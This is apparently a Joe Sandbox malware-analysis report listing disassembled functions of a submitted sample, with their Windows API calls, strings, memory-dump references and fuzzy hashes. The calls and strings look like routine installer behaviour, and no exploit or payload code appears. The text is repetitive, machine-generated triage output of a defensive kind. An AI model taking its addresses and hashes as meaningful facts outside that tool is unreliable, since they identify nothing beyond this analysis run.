                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                                                                      • Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
                                                                                                      • Opcode Fuzzy Hash: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                                                                      • Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
                                                                                                      Function 0047581C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
                                                                                                        • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                                                                      • GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountErrorFileLastMoveTick
                                                                                                      • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                      • API String ID: 2406187244-2685451598
                                                                                                      • Opcode ID: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                                                                      • Instruction ID: 8ae0701305b01ce1bca9537847079d861391bf026d2cb8563746cd807755024f
                                                                                                      • Opcode Fuzzy Hash: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                                                                      • Instruction Fuzzy Hash: BB4166B0A006098FDB10EFA5D882ADE77B5EF48314F60853BE514BB351D7789A058BA9
                                                                                                      Function 00413D08 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetDesktopWindow.USER32 ref: 00413D56
                                                                                                      • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                                        • Part of subcall function 00418ED0: 6F58C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
                                                                                                        • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
                                                                                                      • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorDesktopWindow$Show
                                                                                                      • String ID:
                                                                                                      • API String ID: 2074268717-0
                                                                                                      • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                                      • Instruction ID: 95de96b99ba854305cf3f6c98da1fc171ffd9c3687d173b50ed20deed18b133b
                                                                                                      • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                                      • Instruction Fuzzy Hash: 59411F75600250AFC710DF2AFA85B5677E1EB64319F15817BE404CB365DB38AD81CF98
                                                                                                      Function 00408A5C Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                                      • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                                      • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadString$FileMessageModuleName
                                                                                                      • String ID:
                                                                                                      • API String ID: 704749118-0
                                                                                                      • Opcode ID: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                                      • Instruction ID: 11344639af0fa1b95b6fef638a25282c94d515b30ba3ed4b3402aedba36e13da
                                                                                                      • Opcode Fuzzy Hash: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                                      • Instruction Fuzzy Hash: 843133706083849ED330EA658945B9F77D89B85304F40483FF6C8D72D1DB79A9048B67
                                                                                                      Function 0044E8D4 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
                                                                                                        • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
                                                                                                      • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
                                                                                                        • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                                      • IsRectEmpty.USER32(?), ref: 0044E963
                                                                                                      • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 855768636-0
                                                                                                      • Opcode ID: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                                      • Instruction ID: 03991ef50c1cdc1947edd1d0bf9da16660927dd763c0b41cb42d654f0fd6bbd7
                                                                                                      • Opcode Fuzzy Hash: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                                      • Instruction Fuzzy Hash: 47113871B5030027E250AA7A9C86B5B76899B88748F14093FB546EB3C7EE7DDC09429D
                                                                                                      Function 004952F4 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00495358
                                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 00495373
                                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 0049538D
                                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 004953A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: OffsetRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 177026234-0
                                                                                                      • Opcode ID: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                                      • Instruction ID: af1c1dfc71d00ff4a9a929e8d6bf6bfabc08d13bc1b1844b1e7d273cf48c6b2a
                                                                                                      • Opcode Fuzzy Hash: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                                      • Instruction Fuzzy Hash: 94217CB6700701ABD700DE69CD85E5BB7DEEBC4344F24CA2AF954C7249D634ED0487A6
                                                                                                      Function 00417228 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCursorPos.USER32 ref: 00417270
                                                                                                      • SetCursor.USER32(00000000), ref: 004172B3
                                                                                                      • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                                      • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1959210111-0
                                                                                                      • Opcode ID: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                                      • Instruction ID: a2974bbdd40a4ad71efed6c963999b1e78101043f5dd1c0306289f7dfca9f025
                                                                                                      • Opcode Fuzzy Hash: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                                      • Instruction Fuzzy Hash: 4321A1313082018BCB20AB69E985AE733B1EF44754B0545ABF854CB352D73CDC82CB89
                                                                                                      Function 00494FAC Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
                                                                                                      • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
                                                                                                      • MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
                                                                                                      • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                      • Instruction ID: c81a7ae82503e1df060b9d2e8e6c822c04bb2cec442f3182d8fec1f0f0e8f71f
                                                                                                      • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                      • Instruction Fuzzy Hash: 48112472604204ABCF50DE99C8C4D9B7BECEF4D320B1541A6F918DB246D674DD408BA4
                                                                                                      Function 0041F490 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                                      • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                                      • RegisterClassA.USER32(00499598), ref: 0041F4E4
                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 4025006896-0
                                                                                                      • Opcode ID: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                                                                      • Instruction ID: e8d232a05c88a2160d81946a52d6ac90de0a8bd7e5396313334bc6410d622602
                                                                                                      • Opcode Fuzzy Hash: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                                                                      • Instruction Fuzzy Hash: 7B011B722401047BDA10EB6DED81E9B3799D719314B11413BBA15E72A1D7369C154BAC
                                                                                                      Function 00454F68 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                                      • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                                      • CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 4071923889-0
                                                                                                      • Opcode ID: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                                      • Instruction ID: 44a5693fa59bfbe72ab063cfacecacb9b789a88f4d4f9747d0667cdf65a63c8e
                                                                                                      • Opcode Fuzzy Hash: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                                      • Instruction Fuzzy Hash: 7201F9716046087EEB20979E8C06F6B7BACDF44774F610167F904DB2C2C6785D40C668
                                                                                                      Function 0040D210 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                                      • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                                      • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
                                                                                                      • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                                      • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                                      • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                                      • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                                      Function 004019CC Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                      • String ID:
                                                                                                      • API String ID: 730355536-0
                                                                                                      • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                      • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                      • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                      • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                      Function 0047009C Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
                                                                                                      Strings
                                                                                                      • Unsetting NTFS compression on directory: %s, xrefs: 004700D3
                                                                                                      • Setting NTFS compression on directory: %s, xrefs: 004700BB
                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 004700FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                      • API String ID: 1452528299-1392080489
                                                                                                      • Opcode ID: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                                                                      • Instruction ID: 8e5543267561a70d3fbbbef991b1365390ff1382f756d9cdf86c8bb39141f558
                                                                                                      • Opcode Fuzzy Hash: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                                                                      • Instruction Fuzzy Hash: C9011730E0928C96CF05D7ADA0412DDBBF4DF4D314F84C1AFA45DE7282DA790609879A
                                                                                                      Function 00470848 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00470899
                                                                                                      Strings
                                                                                                      • Setting NTFS compression on file: %s, xrefs: 00470867
                                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 004708AA
                                                                                                      • Unsetting NTFS compression on file: %s, xrefs: 0047087F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                      • API String ID: 1452528299-3038984924
                                                                                                      • Opcode ID: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                                                                      • Instruction ID: 78fa65e16581c334b53b8e167e27839d8ecb3154876bc13dabe901d18edf2e93
                                                                                                      • Opcode Fuzzy Hash: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                                                                      • Instruction Fuzzy Hash: 5C01F430D092489ADB04A7E9A4412EDBBF49F09314F45C1ABA459E7282DAB9050947DB
                                                                                                      Function 00455D88 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                                                                      • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                                                                      Memory Dump Source
